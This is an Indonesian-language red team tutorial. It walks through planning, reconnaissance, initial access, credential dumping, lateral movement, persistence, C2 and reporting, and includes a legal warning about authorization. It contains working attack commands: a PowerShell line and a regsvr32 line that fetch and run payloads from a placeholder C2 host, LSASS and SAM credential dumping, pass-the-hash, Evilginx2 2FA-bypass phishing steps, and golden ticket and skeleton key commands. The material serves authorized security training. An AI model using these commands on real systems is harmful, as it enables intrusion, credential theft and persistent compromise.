π Daftar Isi
1. Pengenalan Red Team Operations
Red Team adalah kelompok keamanan yang mensimulasikan serangan cyber secara realistis untuk menguji pertahanan (Blue Team) organisasi. Berbeda dengan penetration testing tradisional yang biasanya terfokus pada menemukan kerentanan teknis, Red Team Operations meniru Tactics, Techniques, and Procedures (TTP) dari ancaman nyata (adversary) untuk mengukur kemampuan deteksi dan respons organisasi secara keseluruhan.
Red Team vs Penetration Testing
| Aspek | Penetration Testing | Red Team Operations |
|---|---|---|
| Tujuan | Temukan sebanyak mungkin kerentanan | Capai objective spesifik (flag) tanpa terdeteksi |
| Scope | Biasanya terbatas pada target teknis tertentu | Seluruh organisasi: fisik, sosial, teknis |
| Durasi | 1-4 minggu | 4-12 minggu atau lebih |
| Pendekatan | Automated + manual testing | Adversary simulation dengan TTP realistis |
| Detection | Tidak terlalu menghindari deteksi | Menghindari deteksi semaksimal mungkin |
| Reporting | Daftar vuln + rekomendasi | Narrative report, attack story, gaps analysis |
| Tim | 1-3 tester | 3-8+ operator dengan role berbeda |
β οΈ Peringatan Hukum
Red Team Operations HARUS dilakukan dengan izin tertulis (Rules of Engagement) dari pemilik sistem. Operasi tanpa izin adalah kejahatan siber yang melanggar UU ITE di Indonesia dan dapat dipidanakan.
Diagram: Red Team Attack Lifecycle (MITRE ATT&CK)
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ β RED TEAM ATTACK LIFECYCLE β β β β ββββββββββββ ββββββββββββ ββββββββββββ ββββββββββββ β β β 1. RECON ββββΆβ2. WEAPON-ββββΆβ 3. DELIVERYββββΆβ 4. EXPLOITβ β β β β β IZATION β β β β β β β β β’ OSINT β β β’ C2 β β β’ Phishingβ β β’ Execute β β β β β’ Scan β β β’ Payloadβ β β’ Physicalβ β β’ Install β β β β β’ Enum β β β’ Implantβ β β’ Supply β β β’ Persist β β β ββββββββββββ ββββββββββββ ββββββββββββ ββββββββββββ β β β β β β βΌ βΌ β β ββββββββββββ ββββββββββββ ββββββββββββ ββββββββββββ β β β 8. CLEAN βββββ7. EXFIL βββββ 6. OBJECTβββββ 5. LATER-β β β β UP β β β β -IVES β β AL MOVE β β β β β β β’ Data β β β β β β β β β’ Remove β β exfil β β β’ Flag β β β’ Pivot β β β β β’ Clean β β β’ C2 β β β’ Achievedβ β β’ Creds β β β β logs β β comm β β β β β’ Access β β β ββββββββββββ ββββββββββββ ββββββββββββ ββββββββββββ β β β β Blue Team Detection Points: β β [SIEM] [EDR] [NDR] [WAF] [DLP] [SOC] [Honeypots] β ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
2. Planning & Scoping
Planning adalah tahap paling kritis dalam Red Team engagement. Perencanaan yang buruk dapat mengakibatkan scope creep, masalah hukum, atau bahkan kerusakan sistem produksi.
2.1 Rules of Engagement (RoE)
Template β Rules of Engagement
# ===== RULES OF ENGAGEMENT (RoE) TEMPLATE ===== # 1. AUTHORIZATION # - Surat izin tertulis dari C-level management # - Scope dan target yang disetujui # - Durasi engagement # - Emergency contact dan escalation path # 2. SCOPE # In-Scope: # - *.target.com (semua subdomain) # - 10.0.0.0/8 (network internal) # - Physical: Gedung A dan B, Jakarta # - Social engineering: Email phishing ke departemen tertentu # # Out-of-Scope: # - Production database (hanya read-only) # - Critical infrastructure (SCADA/ICS) # - Third-party systems # - Denial of Service (DoS) attacks # 3. CONSTRAINTS # - Jangan mengganggu operasi bisnis # - Jangan merusak atau menghapus data # - Jangan mengenkripsi data (ransomware simulation) # - Target window: jam kerja saja atau 24/7? # - Data handling: semua data sensitif di-encrypt # 4. COMMUNICATION # - Primary: Encrypted channel (Signal/Keybase) # - Emergency: Phone call ke POC # - Status update: Setiap 48 jam # - Kill switch: Kata kunci untuk menghentikan operasi # 5. OBJECTIVES (FLAGS) # - Flag 1: Akses ke sistem internal # - Flag 2: Akses ke database sensitif # - Flag 3: Domain admin access # - Flag 4: Exfiltrasi data sensitif (simulasi) # - Flag 5: Akses ke sistem keuangan # 6. LEGAL # - NDA (Non-Disclosure Agreement) # - Liability waiver # - Data destruction confirmation # - Insurance requirements
2.2 MITRE ATT&CK Planning
Framework β MITRE ATT&CK Mapping
# ===== MITRE ATT&CK PLANNING ===== # MITRE ATT&CK adalah framework yang mendokumentasikan # TTP (Tactics, Techniques, and Procedures) adversary # TACTICS (Tujuan): # TA0043 - Reconnaissance # TA0042 - Resource Development # TA0001 - Initial Access # TA0002 - Execution # TA0003 - Persistence # TA0004 - Privilege Escalation # TA0005 - Defense Evasion # TA0006 - Credential Access # TA0007 - Discovery # TA0008 - Lateral Movement # TA0009 - Collection # TA0011 - Command and Control # TA0010 - Exfiltration # TA0040 - Impact # ===== CONTOH ATTACK PLAN ===== # Phase 1: Reconnaissance (Minggu 1) # ββββββββββββββββββββββββββββββββββ # T1595.002 - Active Scanning: Vulnerability Scanning # T1592.002 - Gather Victim Host Information: Software # T1589.002 - Gather Victim Identity Information: Email # Tools: Nmap, Shodan, theHarvester, Recon-ng # Phase 2: Initial Access (Minggu 2) # ββββββββββββββββββββββββββββββββββ # T1566.001 - Phishing: Spearphishing Attachment # T1566.002 - Phishing: Spearphishing Link # T1190 - Exploit Public-Facing Application # Tools: GoPhish, SET, Cobalt Strike, Evilginx2 # Phase 3: Execution & Persistence (Minggu 3) # βββββββββββββββββββββββββββββββββββββββββββββ # T1059.001 - Command and Scripting Interpreter: PowerShell # T1053.005 - Scheduled Task/Job: Scheduled Task # T1547.001 - Boot or Logon Autostart: Registry Run Keys # Tools: Cobalt Strike, Covenant, Sliver # Phase 4: Privilege Escalation (Minggu 4) # βββββββββββββββββββββββββββββββββββββββββ # T1068 - Exploitation for Privilege Escalation # T1055.001 - Process Injection: DLL Injection # T1134 - Access Token Manipulation # Tools: Mimikatz, Rubeus, PrintSpoofer # Phase 5: Lateral Movement (Minggu 5) # ββββββββββββββββββββββββββββββββββββββ # T1021.002 - Remote Services: SMB/Windows Admin Shares # T1021.001 - Remote Services: RDP # T1550.002 - Use Alternate Auth: Pass the Hash # Tools: CrackMapExec, Impacket, Evil-WinRM # Phase 6: Objective & Exfiltration (Minggu 6) # ββββββββββββββββββββββββββββββββββββββββββββββ # T1005 - Data from Local System # T1041 - Exfiltration Over C2 Channel # T1567 - Exfiltration Over Web Service # Tools: Custom exfil scripts, C2 channels
3. Reconnaissance
Bash β Red Team Reconnaissance
# ===== PASSIVE RECONNAISSANCE ===== # 1. OSINT Framework # Subdomain enumeration subfinder -d target.com -o subdomains.txt amass enum -passive -d target.com -o amass_results.txt assetfinder --subs-only target.com | tee assetfinder.txt # 2. Email harvesting theHarvester -d target.com -b google,linkedin,github -l 500 # 3. Technology fingerprinting whatweb https://target.com wappalyzer target.com # 4. Shodan / Censys # Cari exposed services # shodan search "org:Target ssl.cert.subject.CN:target.com" # censys search "services.tls.certificates.leaf.names: target.com" # 5. GitHub/GitLab secrets trufflehog git https://github.com/target-org --regex git-secrets --scan # 6. DNS enumeration dnsrecon -d target.com -t std dnsenum target.com # 7. Certificate Transparency curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq '.[].name_value' | sort -u # ===== ACTIVE RECONNAISSANCE ===== # 1. Port Scanning (lebih stealth) # TCP SYN scan (stealthier) nmap -sS -T2 -Pn --top-ports 1000 target.com # Service version detection nmap -sV -sC -T3 -p- target.com -oA full_scan # 2. Web Application Scanning # Directory enumeration feroxbuster -u https://target.com -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt # Parameter discovery arjun -u https://target.com/api/endpoint # 3. Network Mapping # SNMP enumeration onesixtyone -c community_strings.txt target_range snmpwalk -v2c -c public target_ip # SMB enumeration enum4linux -a target_ip smbclient -L //target_ip -N # 4. Cloud Reconnaissance # AWS S3 bucket enumeration # cloud_enum -k target-name # S3Scanner scan --bucket-file buckets.txt
4. Initial Access
Techniques β Initial Access Methods
# ===== INITIAL ACCESS TECHNIQUES ===== # 1. SPEAR PHISHING # Targeted phishing dengan payload yang disesuaikan # GoPhish setup: # - Buat campaign dengan email template realistis # - Landing page mirip target (credential harvesting) # - Attachment: macro-enabled documents, LNK files, ISO # Phishing email yang efektif: # - Pretext yang relevan (HR, IT support, vendor) # - Personalisasi (nama korban, departemen) # - Urgency (deadline, security alert) # - Sender spoofing (DMARC bypass) # 2. EVILGINX2 β Advanced Phishing # Reverse proxy phishing untuk bypass 2FA # ./evilginx2 # > config domain phish.com # > phishlets hostname office365 login.target.com # > phishlets enable office365 # > lures create office365 # > lures get-url 1 # 3. WATERING HOLE # Compromise website yang sering dikunjungi target # Inject malicious JavaScript untuk browser exploitation # 4. CREDENTIAL STUFFING # Menggunakan breach data untuk akses VPN/portal # Cek https://haveibeenpwned.com untuk breach data # 5. PHYSICAL ACCESS # USB drop attack (Hak5 USB Rubber Ducky) # Tailgating ke area terlarang # RFID cloning untuk akses gedung # ===== POST INITIAL ACCESS ===== # Setelah mendapatkan akses awal: # 1. Stabilkan akses (C2 beacon) # 2. Enumerate sistem lokal # 3. Cari credential dan informasi sensitif # 4. Tentukan langkah selanjutnya (pivot, escalate)
5. Execution & Post-Exploitation
Techniques β Execution & Post-Exploitation
# ===== EXECUTION TECHNIQUES =====
# 1. LIVING OFF THE LAND (LOLBINS)
# Menggunakan tools bawaan OS untuk menghindari AV/EDR
# PowerShell Empire / Covenant
# Gunakan PowerShell untuk execution tanpa file di disk
powershell -ep bypass -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('https://c2.server.com/agent.ps1')"
# MSBuild execution (bypass AppLocker)
# Simpan payload sebagai XML dan jalankan dengan MSBuild
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe payload.xml
# InstallUtil execution
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U payload.dll
# Regsvr32 (SCT payload)
regsvr32 /s /n /u /i:https://c2.server.com/payload.sct scrobj.dll
# 2. DLL HIJACKING
# Cari DLL yang dimuat dari path yang bisa ditulis
# Tools: Process Monitor, SharpDLLProxy
# Replace atau plant malicious DLL
# 3. PROCESS INJECTION
# Inject kode ke process yang sudah berjalan
# Process Hollowing, APC Injection, Thread Hijacking
# ===== CREDENTIAL ACCESS =====
# 1. Mimikatz β Credential Dumping
# Sekarang: gunakan versi yang sudah di-compile sendiri
# atau gunakan Invoke-Mimikatz (PowerShell)
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
# 2. SAM Database Dump
reg save hklm\sam C:\temp\sam
reg save hklm\system C:\temp\system
# Offline cracking dengan impacket:
secretsdump -sam sam -system system LOCAL
# 3. LSASS Memory Dump
# Procdump (signed Microsoft tool!)
procdump.exe -accepteula -ma lsass.exe C:\temp\lsass.dmp
# Mimikatz offline:
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" exit
# 4. Kerberoasting
# Request TGS tickets untuk service accounts
# dan crack offline
impacket-GetUserSPNs target.com/user:password -request -outputfile hashes.txt
hashcat -m 13100 hashes.txt rockyou.txt
# 5. AS-REP Roasting
# Request AS-REP untuk accounts tanpa preauth
impacket-GetNPUsers target.com/ -usersfile users.txt -format hashcat -outputfile asrep_hashes.txt
6. Lateral Movement
Techniques β Lateral Movement
# ===== LATERAL MOVEMENT TECHNIQUES ===== # 1. PASS THE HASH (PtH) # Gunakan NTLM hash langsung tanpa perlu password crackmapexec smb 10.10.10.0/24 -u admin -H 'aad3b435b51404eeaad3b435b51404ee:hash_here' evil-winrm -i 10.10.10.100 -u admin -H 'hash_here' # 2. PASS THE TICKET (PtT) # Gunakan Kerberos ticket (TGT/TGS) # Export ticket dari Mimikatz: mimikatz.exe "kerberos::ptt ticket.kirbi" # Atau dengan Rubeus: Rubeus.exe ptt /ticket:base64_ticket # 3. OVERPASS THE HASH β PASS THE KEY # Dari NTLM hash, dapatkan Kerberos TGT mimikatz.exe "sekurlsa::pth /user:admin /domain:target.com /ntlm:hash /run:cmd.exe" # 4. PSExec / WMIExec / SMBExec # Remote execution ke sistem lain impacket-psexec target.com/admin:password@10.10.10.100 impacket-wmiexec target.com/admin:password@10.10.10.100 impacket-smbexec target.com/admin:password@10.10.10.100 # 5. RDP # Remote desktop ke sistem lain xfreerdp /u:admin /p:password /v:10.10.10.100 /dynamic-resolution # 6. SSH TUNNELING # Buat tunnel untuk mengakses jaringan internal ssh -D 1080 user@pivot_host # Atau remote port forwarding: ssh -R 8080:internal_host:80 user@external_server # 7. BLOODHOUND β AD Attack Path Mapping # Collect data SharpHound.exe -c All --zipfilename data.zip # Atau dari Linux: bloodhound-python -u user -p password -d target.com -c All # Analyze dengan BloodHound GUI # Cari shortest path ke Domain Admin # Common attack paths: # - Kerberoastable accounts with path to DA # - Unconstrained delegation # - DCSync rights # - Admin access to computers
7. Persistence & C2
Techniques β Persistence & Command and Control
# ===== PERSISTENCE TECHNIQUES ===== # 1. REGISTRY RUN KEYS reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "UpdateService" /t REG_SZ /d "C:\Users\Public\agent.exe" /f # 2. SCHEDULED TASKS schtasks /create /tn "SystemUpdate" /tr "C:\Users\Public\agent.exe" /sc onlogon /ru SYSTEM # 3. WMI EVENT SUBSCRIPTION # Persistent WMI event yang menjalankan payload # pada kondisi tertentu (timer, logon, dll) # 4. STARTUP FOLDER copy agent.exe "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\" # 5. DLL SIDE-LOADING # Plant DLL di direktori yang di-load oleh legitimate app # 6. GOLDEN TICKET (Kerberos) # Forge TGT dengan KRBTGT hash β akses permanent mimikatz.exe "kerberos::golden /user:admin /domain:target.com /sid:S-1-5-21-xxx /krbtgt:hash /id:500 /ptt" # 7. SKELETON KEY # Patch LSASS untuk menerima password universal mimikatz.exe "misc::skeleton" # ===== COMMAND AND CONTROL (C2) ===== # C2 Frameworks: # 1. Cobalt Strike (komersial, $3,500+/year) # - Industry standard untuk Red Team # - Malleable C2 profiles # - Beacon-based # - SOCKS proxy, lateral movement tools # 2. Sliver (open source) # - Go-based C2 framework # - Multiplayer (team collaboration) # - HTTP, DNS, WireGuard C2 channels # - Armory (plugin marketplace) sliver-server > generate --mtls 10.10.10.1 --os windows --arch amd64 --save agent.exe > mtls > sessions # 3. Covenant (.NET C2) # - ASP.NET Core based # - Web UI # - Grunt (implant) management # 4. Mythic (open source) # - Modern C2 framework # - Multiple agent types # - GraphQL API # ===== C2 EVASION ===== # 1. Domain Fronting β Gunakan CDN untuk menyembunyikan C2 # 2. Malleable C2 β Customize traffic agar mirip aplikasi asli # 3. Encrypted Channels β HTTPS, DNS-over-HTTPS # 4. Redirectors β Cloudflare Workers, AWS Lambda # 5. Sleep Timers β Reduce beacon frequency # 6. Jitter β Randomize beacon intervals
8. Red Team Tools & Framework
| Kategori | Tools | Keterangan |
|---|---|---|
| C2 Framework | Cobalt Strike, Sliver, Mythic, Covenant | Command & Control |
| Reconnaissance | Amass, subfinder, Recon-ng, SpiderFoot | OSINT & enumeration |
| Phishing | GoPhish, Evilginx2, SET | Social engineering |
| Exploitation | Metasploit, CrackMapExec, Impacket | Exploit & lateral movement |
| Credential | Mimikatz, Rubeus, LaZagne | Credential harvesting |
| Evasion | ScareCrow, NimCrypt, Freeze | AV/EDR bypass |
| AD Attack | BloodHound, ADRecon, PingCastle | Active Directory analysis |
| Reporting | Cherry Tree, Dradis, PlexTrac | Documentation & reporting |
9. Reporting & Debrief
Template β Red Team Report Structure
# ===== RED TEAM REPORT STRUCTURE ===== # 1. EXECUTIVE SUMMARY (1-2 halaman) # - Ringkasan untuk C-level management # - Apa yang dilakukan, apa yang ditemukan # - Risk rating keseluruhan # - Key findings dan rekomendasi # 2. ENGAGEMENT OVERVIEW # - Scope dan objectives # - Timeline operasi # - Tim yang terlibat # - Rules of engagement # 3. ATTACK NARRATIVE (bagian terpenting!) # Ceritakan alur serangan dari awal hingga akhir: # # "Pada hari ke-3, tim berhasil mendapatkan # credential karyawan melalui phishing email # yang menyamar sebagai notifikasi IT support. # Credential ini memberikan akses ke VPN # dan selanjutnya ke jaringan internal..." # # Setiap tahap dijelaskan dengan: # - Apa yang dilakukan # - Mengapa berhasil # - Screenshot/evidence # - MITRE ATT&CK technique ID # 4. TECHNICAL FINDINGS # Finding 1: [Judul] # βββ Severity: Critical/High/Medium/Low # βββ MITRE ATT&CK: T1566.001 # βββ Description: Detail teknis # βββ Evidence: Screenshot, logs # βββ Impact: Dampak bisnis # βββ Recommendation: Cara memperbaiki # 5. DETECTION GAP ANALYSIS # - Tahap mana yang terdeteksi Blue Team? # - Tahap mana yang TIDAK terdeteksi? # - Berapa lama waktu deteksi rata-rata? # - Apakah SOC melakukan response yang tepat? # 6. MITIGATION RECOMMENDATIONS # Prioritized berdasarkan risk: # 1. [CRITICAL] Implementasi MFA di semua sistem # 2. [HIGH] Network segmentation # 3. [HIGH] EDR deployment # 4. [MEDIUM] Security awareness training # 5. [MEDIUM] Log monitoring improvement # 7. APPENDICES # - Full tool logs # - Evidence screenshots # - MITRE ATT&CK heat map # - Raw data exports
10. Quiz Pemahaman
Uji pemahaman Anda tentang Red Team Operations: